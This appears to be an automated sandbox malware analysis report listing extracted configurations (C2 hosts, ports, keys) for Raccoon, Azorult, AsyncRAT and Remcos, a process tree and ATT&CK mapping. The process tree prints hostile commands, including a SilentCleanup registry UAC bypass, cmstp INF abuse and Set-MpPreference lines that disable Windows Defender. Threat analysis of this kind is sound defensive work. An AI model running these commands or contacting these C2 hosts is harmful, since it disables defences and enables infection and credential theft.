Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

  • max time kernel
    1805s
  • max time network
    1817s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-11-2020 17:26

General

Malware Config

Extracted

Family

raccoon

Botnet

5e4db353b88c002ba6466c06437973619aad03b3

Attributes
  • url4cnc

    https://telete.in/brikitiki

rc4.plain
rc4.plain

Extracted

Family

azorult

C2

http://195.245.112.115/index.php

Extracted

Family

asyncrat

Version

0.5.7B

C2

agentttt.ac.ug:6970

agentpurple.ac.ug:6970

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • aes_key

    16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr

  • anti_detection

    false

  • autorun

    false

  • bdos

    false

  • delay

    Default

  • host

    agentttt.ac.ug,agentpurple.ac.ug

  • hwid

    3

  • install_file

  • install_folder

    %AppData%

  • mutex

    AsyncMutex_6SI8OkPnk

  • pastebin_config

    null

  • port

    6970

  • version

    0.5.7B

aes.plain

Extracted

Family

remcos

C2

taenaia.ac.ug:6969

agentpapple.ac.ug:6969

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • BetaBot

    Beta Bot is a Trojan that infects computers and disables Antivirus.

  • Contains code to disable Windows Defender 10 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies firewall policy service 2 TTPs 8 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • UAC bypass 3 TTPs
  • Async RAT payload 3 IoCs
  • ModiLoader First Stage 2 IoCs
  • Disables taskbar notifications via registry modification
  • Disables use of System Restore points 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 31 IoCs
  • Sets file execution options in registry 2 TTPs
  • Sets service image path in registry 2 TTPs
  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 18 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Checks for any installed AV software in registry 1 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Drops desktop.ini file(s) 3 IoCs
  • Maps connected drives based on registry 3 TTPs 4 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 27 IoCs
  • Suspicious use of SetThreadContext 16 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
  • Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies registry key 1 TTPs 4 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs regedit.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 9 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe
    "C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe
      "C:\Users\Admin\AppData\Local\Temp\ou55sg33s_1.exe"
      2⤵
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Checks processor information in registry
      • Suspicious behavior: MapViewOfSection
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4240
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        3⤵
        • Modifies firewall policy service
        • Checks BIOS information in registry
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Checks processor information in registry
        • Enumerates system info in registry
        • Modifies Internet Explorer Protected Mode
        • Modifies Internet Explorer Protected Mode Banner
        • Modifies Internet Explorer settings
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:728
        • C:\Users\Admin\AppData\Local\Temp\1k1k37mkkua_1.exe
          /suac
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:892
          • C:\Users\Admin\AppData\Local\Temp\1k1k37mkkua_1.exe
            "C:\Users\Admin\AppData\Local\Temp\1k1k37mkkua_1.exe"
            5⤵
            • Modifies firewall policy service
            • Executes dropped EXE
            • Checks for any installed AV software in registry
            • Checks whether UAC is enabled
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Checks processor information in registry
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:8
            • C:\Windows\SysWOW64\regedit.exe
              "C:\Windows\SysWOW64\regedit.exe"
              6⤵
              • Modifies security service
              • Adds Run key to start application
              • Modifies Internet Explorer settings
              • Runs regedit.exe
              • Suspicious use of AdjustPrivilegeToken
              PID:1164
        • C:\Users\Admin\AppData\Local\Temp\i5ko1gq3.exe
          "C:\Users\Admin\AppData\Local\Temp\i5ko1gq3.exe"
          4⤵
          • Executes dropped EXE
          • Checks whether UAC is enabled
          • Maps connected drives based on registry
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1332
          • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
            "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1868
            • C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe
              "C:\Users\Admin\AppData\Local\Temp\FGbfttrev.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2952
          • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
            "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:2044
            • C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe
              "C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:3092
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /pid 3092 & erase C:\Users\Admin\AppData\Local\Temp\FDvbcgfert.exe & RD /S /Q C:\\ProgramData\\048486387514550\\* & exit
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4648
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /pid 3092
                  8⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4776
          • C:\Users\Admin\AppData\Local\Temp\i5ko1gq3.exe
            "C:\Users\Admin\AppData\Local\Temp\i5ko1gq3.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops desktop.ini file(s)
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of WriteProcessMemory
            PID:2100
            • C:\Users\Admin\AppData\Local\Temp\Kh9HAGPN47.exe
              "C:\Users\Admin\AppData\Local\Temp\Kh9HAGPN47.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of AdjustPrivilegeToken
              PID:2684
              • C:\Users\Admin\AppData\Local\Temp\Kh9HAGPN47.exe
                "C:\Users\Admin\AppData\Local\Temp\Kh9HAGPN47.exe"
                7⤵
                • Executes dropped EXE
                PID:4196
            • C:\Users\Admin\AppData\Local\Temp\sBoMkm8Emq.exe
              "C:\Users\Admin\AppData\Local\Temp\sBoMkm8Emq.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • Modifies system certificate store
              PID:1108
              • C:\Windows\SysWOW64\svchost.exe
                "C:\Windows\System32\svchost.exe"
                7⤵
                  PID:5408
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GEeXQtso.bat" "
                    8⤵
                      PID:4868
                      • C:\Windows\SysWOW64\reg.exe
                        reg delete hkcu\Environment /v windir /f
                        9⤵
                        • Modifies registry key
                        PID:5704
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Public\GEeXQtso.bat" "
                      8⤵
                        PID:232
                    • C:\Program Files (x86)\internet explorer\ieinstal.exe
                      "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                      7⤵
                        PID:3604
                    • C:\Users\Admin\AppData\Local\Temp\xmaOzJ8fRh.exe
                      "C:\Users\Admin\AppData\Local\Temp\xmaOzJ8fRh.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4504
                      • C:\Users\Admin\AppData\Local\Temp\xmaOzJ8fRh.exe
                        "C:\Users\Admin\AppData\Local\Temp\xmaOzJ8fRh.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:3380
                        • \??\c:\windows\SysWOW64\cmstp.exe
                          "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\xz2gnxgb.inf
                          8⤵
                            PID:4308
                      • C:\Users\Admin\AppData\Local\Temp\ZB2TkBHFSJ.exe
                        "C:\Users\Admin\AppData\Local\Temp\ZB2TkBHFSJ.exe"
                        6⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2176
                        • C:\Users\Admin\AppData\Local\Temp\ZB2TkBHFSJ.exe
                          "C:\Users\Admin\AppData\Local\Temp\ZB2TkBHFSJ.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:2796
                        • C:\Users\Admin\AppData\Local\Temp\ZB2TkBHFSJ.exe
                          "C:\Users\Admin\AppData\Local\Temp\ZB2TkBHFSJ.exe"
                          7⤵
                          • Executes dropped EXE
                          • Windows security modification
                          PID:3284
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            "powershell" Get-MpPreference -verbose
                            8⤵
                              PID:5048
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\i5ko1gq3.exe"
                          6⤵
                            PID:4740
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /T 10 /NOBREAK
                              7⤵
                              • Delays execution with timeout.exe
                              PID:980
                      • C:\Users\Admin\AppData\Local\Temp\7ygs3iyoe553.exe
                        "C:\Users\Admin\AppData\Local\Temp\7ygs3iyoe553.exe"
                        4⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Checks whether UAC is enabled
                        • Maps connected drives based on registry
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of SetThreadContext
                        PID:2068
                        • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                          "C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:5972
                          • C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
                            "C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:4884
                            • C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe
                              "{path}"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4964
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 4964 & erase C:\Users\Admin\AppData\Local\Temp\ozchgftrq.exe & RD /S /Q C:\\ProgramData\\817077299111746\\* & exit
                                8⤵
                                  PID:2036
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 4964
                                    9⤵
                                    • Kills process with taskkill
                                    PID:2564
                            • C:\Users\Admin\AppData\Local\Temp\azchgftrq.exe
                              "{path}"
                              6⤵
                              • Executes dropped EXE
                              PID:2588
                          • C:\Users\Admin\AppData\Local\Temp\7ygs3iyoe553.exe
                            "{path}"
                            5⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops desktop.ini file(s)
                            PID:5996
                            • C:\Users\Admin\AppData\Local\Temp\OF6dBdG65L.exe
                              "C:\Users\Admin\AppData\Local\Temp\OF6dBdG65L.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:5548
                              • C:\Users\Admin\AppData\Local\Temp\OF6dBdG65L.exe
                                "C:\Users\Admin\AppData\Local\Temp\OF6dBdG65L.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:3812
                            • C:\Users\Admin\AppData\Local\Temp\o1tY2K7v0u.exe
                              "C:\Users\Admin\AppData\Local\Temp\o1tY2K7v0u.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:5864
                              • C:\Windows\SysWOW64\svchost.exe
                                "C:\Windows\System32\svchost.exe"
                                7⤵
                                  PID:4420
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cnIBvtso.bat" "
                                    8⤵
                                      PID:1740
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg delete hkcu\Environment /v windir /f
                                        9⤵
                                        • Modifies registry key
                                        PID:6024
                                      • C:\Windows\SysWOW64\reg.exe
                                        reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
                                        9⤵
                                        • Modifies registry key
                                        PID:5024
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
                                        9⤵
                                          PID:5608
                                        • C:\Windows\SysWOW64\reg.exe
                                          reg delete hkcu\Environment /v windir /f
                                          9⤵
                                          • Modifies registry key
                                          PID:4716
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cnIBvtso.bat" "
                                        8⤵
                                          PID:4712
                                      • C:\Program Files (x86)\internet explorer\ieinstal.exe
                                        "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                                        7⤵
                                          PID:2760
                                      • C:\Users\Admin\AppData\Local\Temp\pv3egjrqD5.exe
                                        "C:\Users\Admin\AppData\Local\Temp\pv3egjrqD5.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4736
                                        • C:\Users\Admin\AppData\Local\Temp\pv3egjrqD5.exe
                                          "C:\Users\Admin\AppData\Local\Temp\pv3egjrqD5.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:2932
                                          • \??\c:\windows\SysWOW64\cmstp.exe
                                            "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\bswxp5sh.inf
                                            8⤵
                                              PID:4612
                                        • C:\Users\Admin\AppData\Local\Temp\kxsejL2arD.exe
                                          "C:\Users\Admin\AppData\Local\Temp\kxsejL2arD.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:6064
                                          • C:\Users\Admin\AppData\Local\Temp\kxsejL2arD.exe
                                            "C:\Users\Admin\AppData\Local\Temp\kxsejL2arD.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            • Windows security modification
                                            PID:5264
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell" Get-MpPreference -verbose
                                              8⤵
                                                PID:2524
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\7ygs3iyoe553.exe"
                                            6⤵
                                              PID:4784
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                7⤵
                                                • Delays execution with timeout.exe
                                                PID:5396
                                  • C:\Windows\SysWOW64\DllHost.exe
                                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                    1⤵
                                      PID:5040
                                      • C:\Windows\SysWOW64\cmd.exe
                                        cmd /c start C:\Windows\temp\f01qqtnh.exe
                                        2⤵
                                          PID:1428
                                          • C:\Windows\temp\f01qqtnh.exe
                                            C:\Windows\temp\f01qqtnh.exe
                                            3⤵
                                            • Executes dropped EXE
                                            PID:2556
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              "powershell" Get-MpPreference -verbose
                                              4⤵
                                                PID:2572
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                4⤵
                                                  PID:200
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                  4⤵
                                                    PID:4780
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                    4⤵
                                                      PID:1376
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                      4⤵
                                                        PID:5028
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                        4⤵
                                                          PID:4532
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                          4⤵
                                                            PID:4232
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                            4⤵
                                                              PID:4368
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                              4⤵
                                                                PID:3664
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                4⤵
                                                                  PID:4892
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                  4⤵
                                                                    PID:3904
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                    4⤵
                                                                      PID:2824
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                      4⤵
                                                                        PID:4992
                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                    taskkill /IM cmstp.exe /F
                                                                    2⤵
                                                                    • Kills process with taskkill
                                                                    PID:2504
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c start C:\Windows\temp\cgge1ncr.exe
                                                                    2⤵
                                                                      PID:5988
                                                                      • C:\Windows\temp\cgge1ncr.exe
                                                                        C:\Windows\temp\cgge1ncr.exe
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:1008
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          "powershell" Get-MpPreference -verbose
                                                                          4⤵
                                                                            PID:5456
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                            4⤵
                                                                              PID:6140
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                              4⤵
                                                                                PID:4284
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                                                4⤵
                                                                                  PID:5672
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                  4⤵
                                                                                    PID:1044
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                    4⤵
                                                                                      PID:1836
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                      4⤵
                                                                                        PID:4664
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                        4⤵
                                                                                          PID:2828
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                          4⤵
                                                                                            PID:5920
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                            4⤵
                                                                                              PID:5724
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                              4⤵
                                                                                                PID:5392
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                4⤵
                                                                                                  PID:4524
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                  4⤵
                                                                                                    PID:4676
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /IM cmstp.exe /F
                                                                                                2⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:3672

                                                                                            Network

                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                            Persistence

                                                                                            Modify Existing Service

                                                                                            3
                                                                                            T1031

                                                                                            Registry Run Keys / Startup Folder

                                                                                            3
                                                                                            T1060

                                                                                            Privilege Escalation

                                                                                            Bypass User Account Control

                                                                                            1
                                                                                            T1088

                                                                                            Defense Evasion

                                                                                            Modify Registry

                                                                                            13
                                                                                            T1112

                                                                                            Disabling Security Tools

                                                                                            3
                                                                                            T1089

                                                                                            Bypass User Account Control

                                                                                            1
                                                                                            T1088

                                                                                            Install Root Certificate

                                                                                            1
                                                                                            T1130

                                                                                            Credential Access

                                                                                            Credentials in Files

                                                                                            3
                                                                                            T1081

                                                                                            Discovery

                                                                                            Query Registry

                                                                                            5
                                                                                            T1012

                                                                                            System Information Discovery

                                                                                            6
                                                                                            T1082

                                                                                            Security Software Discovery

                                                                                            1
                                                                                            T1063

                                                                                            Peripheral Device Discovery

                                                                                            1
                                                                                            T1120

                                                                                            Collection

                                                                                            Data from Local System

                                                                                            3
                                                                                            T1005

                                                                                            Impact

                                                                                            Inhibit System Recovery

                                                                                            1
                                                                                            T1490

                                                                                            Replay Monitor

                                                                                            Loading Replay Monitor...

                                                                                            Downloads

                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\64DCC9872C5635B1B7891B30665E0558_5552C20A2631357820903FD38A8C0F9F
                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6AF4EE75E3A4ABA658C0087EB9A0BB5B_569A6A04C8591541F7E990B56F9661DA
                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_979AB563CEB98F2581C14ED89B8957D4
                                                                                            • C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\mozglue.dll
                                                                                            • C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\nss3.dll
                                                                                            • C:\Users\Admin\AppData\LocalLow\nb98wqnehe8bw89hb\softokn3.dll
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Kh9HAGPN47.exe.log
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\OF6dBdG65L.exe.log
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ZB2TkBHFSJ.exe.log
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kxsejL2arD.exe.log
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pv3egjrqD5.exe.log
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xmaOzJ8fRh.exe.log
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\ZE6E1RYT.cookie
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
